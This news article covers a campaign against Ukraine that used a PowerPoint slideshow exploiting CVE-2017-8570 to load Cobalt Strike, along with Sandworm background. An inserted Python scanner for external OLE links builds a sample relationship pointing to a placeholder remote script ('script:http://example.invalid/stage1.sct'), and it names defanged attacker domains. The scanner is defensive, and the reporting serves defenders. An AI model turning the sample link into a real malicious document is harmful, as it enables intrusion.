Cybersecurity researchers have discovered a targeted operation against Ukraine that leverages a nearly seven-year-old flaw in Microsoft Office to deliver Cobalt Strike to compromised systems.
According to Deep Instinct, the attack chain dates to late 2023 and uses a PowerPoint slideshow file ('signal-2023-12-20-160512.ppsx') as the starting point. The file name suggests it may have been shared via the Signal instant messaging app.
That said, although the Computer Emergency Response Team of Ukraine (CERT-UA) has discovered two different campaigns that used messaging apps to distribute malware, there is no actual evidence that the PPSX file was delivered through that vector.
Just last week, the agency reported that the Ukrainian military was being targeted by the UAC-0184 group via messaging and dating platforms to deliver malware such as HijackLoader (also known as GHOSTPULSE and SHADOWLADDER), XWorm, and Remcos RAT, as well as open-source programs such as sigtop and tusc to exfiltrate data from compromised computers.
Security researcher Ivan Kosarev said, "The PPSX (PowerPoint Slideshow) file appears to be an old instruction manual for the U.S. military's mine-clearing blade (MCB) for tanks." "The PPSX file contains a remote relationship to an external OLE object."
This involves the exploitation of CVE-2017-8570 (CVSS score: 7.8), a now-patched remote code execution bug in Office that allows an attacker to execute code by convincing a victim to open a specially crafted file. In this case, opening the file causes it to retrieve and run a remote script hosted on weavesilk[.]space.
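For defenders triaging a suspicious slideshow, the relationship Kosarev describes is visible without opening the document: a PPSX is an OOXML zip, and each slide's `_rels/*.rels` part lists its relationships, with remote ones marked `TargetMode="External"`. The following scanner is an added example written for this article; it is not Deep Instinct's code and was not run against the real lure. It builds a constructed, minimal PPSX-like package in memory (the `example.invalid` target URL is a placeholder) and flags any external relationship of the `oleObject` type, or any target using the `script:` moniker prefix that is commonly reported in CVE-2017-8570 exploit documents (that prefix is my assumption, not a detail from the page).

```python
"""Scan a PPSX/PPTX package for relationships that point to external OLE objects.

Added example for this article, not code from the original report.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

# OOXML relationship type for embedded/linked OLE objects, and the OPC relationships namespace.
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
IMAGE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def find_external_ole_rels(package: bytes) -> List[Dict[str, str]]:
    """Return every External-mode relationship that is an oleObject link or a script: moniker.

    Per OPC, a Relationship without TargetMode is Internal, so only explicit
    External entries (the ones that can reach out to a remote host) are considered.
    """
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for part_name in zf.namelist():
            if not part_name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part_name))
            except ET.ParseError:
                # A malformed .rels part is itself worth a look, but is not an OLE finding.
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                # Assumption: "script:" is the moniker prefix seen in CVE-2017-8570 PoCs.
                if rel_type == OLE_REL_TYPE or target.lower().startswith("script:"):
                    findings.append(
                        {
                            "part": part_name,
                            "id": rel.get("Id", ""),
                            "type": rel_type.rsplit("/", 1)[-1],
                            "target": target,
                        }
                    )
    return findings


def build_sample_ppsx() -> bytes:
    """Constructed sample: a stub package with one benign image link and one external OLE link."""
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        f'<Relationships xmlns="{RELS_NS}">\n'
        f'  <Relationship Id="rId1" Type="{IMAGE_REL_TYPE}" Target="../media/image1.png"/>\n'
        f'  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" '
        'Target="script:http://example.invalid/stage1.sct" TargetMode="External"/>\n'
        "</Relationships>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder, not parsed here
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")  # placeholder slide part
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_external_ole_rels(build_sample_ppsx()):
        print(f"{hit['part']}: {hit['id']} ({hit['type']}) -> {hit['target']}")
```

To use it on a real file, pass `open(path, "rb").read()` to `find_external_ole_rels`. Only the relationship metadata is read; the package is never rendered, so the scan is safe to run on an untrusted sample. Any hit should be treated as a lead for sandbox detonation rather than as proof of exploitation on its own, since legitimate linked objects also use External relationships.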
The highly obfuscated script then launches an HTML file containing JavaScript code, which establishes persistence on the host via the Windows Registry and drops the next-stage payload, which impersonates the Cisco AnyConnect VPN client.
The payload contains a dynamic-link library (DLL) that ultimately injects a cracked Cobalt Strike Beacon, a legitimate penetration testing tool, directly into system memory and contacts a command-and-control (C2) server (petapixel[.]fun) for further instructions.
The DLL also includes functionality to check whether it is running inside a virtual machine and to evade detection by security software.
Deep Instinct said it could not attribute the attack to any specific threat actor or group, nor could it rule out the possibility of a red team exercise. The exact end goal of the intrusion is also unknown.
“The decoy contains military-related content, suggesting that it targets military personnel,” Kosarev said.
"But the domain names weavesilk[.]space and petapixel[.]fun are disguised as an unobtrusive generative art site (weavesilk[.]com) and a popular photography site (petapixel[.]com). These are unrelated, and it's a bit puzzling why attackers would use them specifically to fool military personnel."
The disclosure comes as Sandworm (also known as APT44, FROZENBARENTS, Seashell Blizzard, UAC-0002, and Voodoo Bear) has been linked to attacks on approximately 20 energy, water and heating suppliers in Ukraine, with the group assessed to be responsible for most of the destructive and disruptive attacks on the country.
Those attacks used Kapeka (also known as ICYWELL, KnuckleTouch, QUEUESEED, and WrongSense) and its Linux variant BIASBOAT, as well as malware such as GOSSIPFLOW and LOADGRIP, to disrupt critical operations.
GOSSIPFLOW is a Golang-based SOCKS5 proxy, while LOADGRIP is an ELF binary written in C and used to load BIASBOAT on a compromised Linux host.
Sandworm is a prolific and adaptable threat group associated with Unit 74455 within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Known to have been active since at least 2009, the adversary has also been tied to three hacktivist personas engaged in hack-and-leak operations: XakNet Team, Cyber Army of Russia_Reborn, and Solntsepek.
"APT44, backed by Russian military intelligence, is a dynamic and operationally mature threat actor actively engaged in a full range of espionage, attack and influence operations," Mandiant said, explaining that the advanced persistent threat (APT) has been responsible for multiple sustained efforts since January 2022 to help Russia gain a wartime advantage.
"The scope of APT44's activities is global and reflects Russia's broader national interests and ambitions. A long-term pattern of activity shows that APT44 is tasked with a variety of strategic priorities and is likely to be seen as a flexible instrument of power that can 'respond to both permanent and emerging information requirements.'"